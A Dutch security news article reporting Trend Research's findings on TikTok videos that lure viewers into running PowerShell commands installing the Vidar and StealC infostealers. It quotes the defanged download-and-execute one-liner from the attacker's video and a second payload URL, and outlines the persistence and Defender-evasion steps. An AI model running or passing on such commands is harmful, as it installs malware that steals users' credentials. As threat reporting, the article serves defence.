Naast e-mails, websites en USB-sticks verspreidt malware zich nu ook via TikTok. Hoewel indirect, kunnen de kwaadaardige instructies op het videoplatform grote gevolgen hebben.
Zo stelt Trend Research, de onderzoeksafdeling van securitybedrijf Trend Micro. De malware-varianten die kwaadwillenden via TikTok promoten, zijn infostealers. Het gaat hierbij concreet om Vidar en StealC. Mogelijk zijn de video’s AI-gegenereerd, waardoor de verspreiding en veelvuldigheid van de malwarecampagne in sneltreinvaart kan verlopen.
Het algoritme van TikTok vergroot de kans op wijdverspreide blootstelling aanzienlijk, zo zeggen de onderzoekers, waarbij één video meer dan een half miljoen views heeft bereikt. Dit maakt het platform een ideaal middel voor cybercriminelen.
Sociaal engineeren via sociale media
Aanvallers gebruiken al lange tijd sociale mediaplatforms voor hun aanvallen, en TikTok vormt daarop geen uitzondering. Eerdere campagnes maakten echter gebruik van links naar websites waarbij kwaadaardige activiteit kon worden gedetecteerd met traditionele securitysoftware. Social engineering via TikTok is een andere uitdaging, waardoor de PowerShell-uitvoering van de instructies als enkel detectiepunt geldt.
Infostealers zijn daarnaast al erg in trek onder cyberaanvallers. Zo bleken ze de plaag van TU Eindhoven en zijn ze beland op de apparaten van tienduizenden Nederlanders. Infostealers zijn uitgegroeid tot een belangrijk instrument voor cybercriminelen die inloggegevens, persoonlijke gegevens en andere gevoelige informatie verzamelen die vervolgens kunnen leiden tot identiteitsdiefstal, fraude en datalekken.
In deze nieuwe campagne wordt PowerShell, normaal een technisch hulpmiddel, ingezet om de payload op een pc te krijgen. De TikTok-video’s instrueren gebruikers om zelf kwaadaardige commando’s op hun eigen systemen uit te voeren.
Hoe de aanval verloopt
Trend Research identificeerde een TikTok-gebruiker, @gitallowed, die meerdere video’s met de malafide instructies postte. Sindsdien zijn er meer accounts ontdekt met vergelijkbare activiteiten, maar deze zijn inmiddels niet meer actief. Mogelijk wijzigen de aanvallers hun accounts om bans te omzeilen.
In de populairste video (met zeker 500.000 weergaven) presenteert de aanvaller een reeks eenvoudige, stapsgewijze instructies die het kwaadaardige proces zowel legitiem als gemakkelijk te volgen laten lijken: druk op Windows + R, typ PowerShell en voer het volgende commando uit:
iex (irm hxxps://allaivo[.]me/spotify)
Kwaadaardige uitvoeringsketen
Het PowerShell-commando downloadt en voert een script uit dat vervolgens een reeks kwaadaardige acties in gang zet. Het script creëert eerst verborgen mappen binnen de AppData- en LocalAppData-mappen van de gebruiker en voegt deze locaties toe aan de Windows Defender-uitsluitingslijst om detectie te omzeilen.
Vervolgens haalt het script een secundaire payload op van hxxps://amssh[.]co/file.exe, die is geïdentificeerd als Vidar of StealC malware, en slaat deze op in de verborgen map. Het script maakt gebruik van een retry-mechanisme om ervoor te zorgen dat de payload succesvol wordt gedownload en start vervolgens de malware als een verborgen, verhoogd proces.
Als het voorgaande proces succesvol wordt voltooid, downloadt het script een extra PowerShell-script, slaat het op in de verborgen map en zorgt het voor persistentie door een registersleutel te maken die het script bij het opstarten uitvoert. Tenslotte worden tijdelijke mappen verwijderd om forensische sporen te minimaliseren.
Beveiligingsimplicaties
De verschuiving naar sociale media als verspreidingsmechanisme voor malware vereist een herziening van securitymaatregelen, zo merkt Trend Research op. Traditionele controles werken momenteel niet om deze vorm van social engineering tegen te gaan. De vraag is wat er extra te doen is ter voorkoming van aanvallen als de instructies simpelweg via TikTok lopen; meer dan security awareness-training is soms niet te doen. Het is aan de securitywereld om dit te ontkrachten.
De mitigatie mag dan onduidelijk zijn, de gevolgen zijn in ieder geval kraakhelder. Bedrijven kunnen getroffen worden door data-exfiltratie, diefstal van inloggegevens en mogelijke compromittering van gevoelige systemen als gevolg van deze dreiging.